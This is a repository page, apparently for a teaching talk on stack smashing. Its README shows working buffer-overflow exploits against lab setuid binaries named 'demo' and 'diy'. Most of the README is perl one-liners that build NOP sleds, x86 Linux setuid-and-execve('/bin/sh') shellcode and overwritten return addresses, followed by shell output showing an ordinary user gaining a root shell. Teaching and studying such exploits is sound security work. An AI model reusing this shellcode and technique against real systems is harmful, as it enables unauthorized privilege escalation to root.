ward/smash-talk
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
No description
12 commits 1 branch 0 tags 146 KiB
Find a file
Exact
Ward Wouts da757910c8 a bit more on mitigations and the workarounds for those
2023-03-13 15:36:58 +01:00
code another version 2023-02-14 17:15:43 +01:00
index.html a bit more on mitigations and the workarounds for those 2023-03-13 15:36:58 +01:00
README.md minor improvements 2023-03-08 10:32:57 +01:00
Stack.drawio Improve stack description & intro 2020-01-16 15:05:49 +01:00
Stack.png Improve stack description & intro 2020-01-16 15:05:49 +01:00
Stack_Overflow_2.png Import 2020-01-16 08:42:45 +01:00
Stack_Overflow_3.png Import 2020-01-16 08:42:45 +01:00
Stack_Overflow_4.png Import 2020-01-16 08:42:45 +01:00

README.md

Demo

Make sure to point at the shellcode in the commandline, NOT the copied shellcode as that gets mangled. Or pad the shellcode with 20 bytes at the end and make the starter NOP-sled shorter.

atl.HA95-mHA95:wwouts_smash:/smash $ id
uid=48350(atl.HA95) gid=9999(ATLAS) groups=9999(ATLAS)
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x91 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" ."XXXX". "\x30\xcb\xff\xff"'`
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),9999(ATLAS)
sh-4.4# exit

atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x75 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "X"x20 . "\x30\xcb\xff\xff"'`

DIY

export BLAA=`perl -e 'print "\x90"x213 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`

gdb ./diy

atl.HA95-mHA95:wwouts_smash:/smash $ perl -e 'print "X"x250 . "" . "XXXX" . "\x24\xdc\xff\xff" . "CCCCDDDDEEEE\n";' >foo.txt
atl.HA95-mHA95:wwouts_smash:/smash $ cat foo.txt |./diy
What's your name?
Hello, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$▒▒▒CCCCDDDDEEEE
atl.HA95-mHA95:wwouts_smash:/smash $ (cat foo.txt;cat) |./diy
What's your name?
Hello, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$▒▒▒CCCCDDDDEEEE
ls
demo  diy  foo.txt  setup.sh  shellcode.txt  shellcode2.txt
id
uid=0(root) gid=0(root) groups=0(root),9999(ATLAS)

Test without the dodgy push EBX atl.HA95-mHA95:wwouts_smash:/smash $ ./demo perl -e 'print "\x90"x91 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x90\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" ."XXXX". "\xdc\xcd\xff\xff" . "\xdc\xcd\xff\xff" . "\xdc\xcd\xff\xff" . "BBBBCCCC"'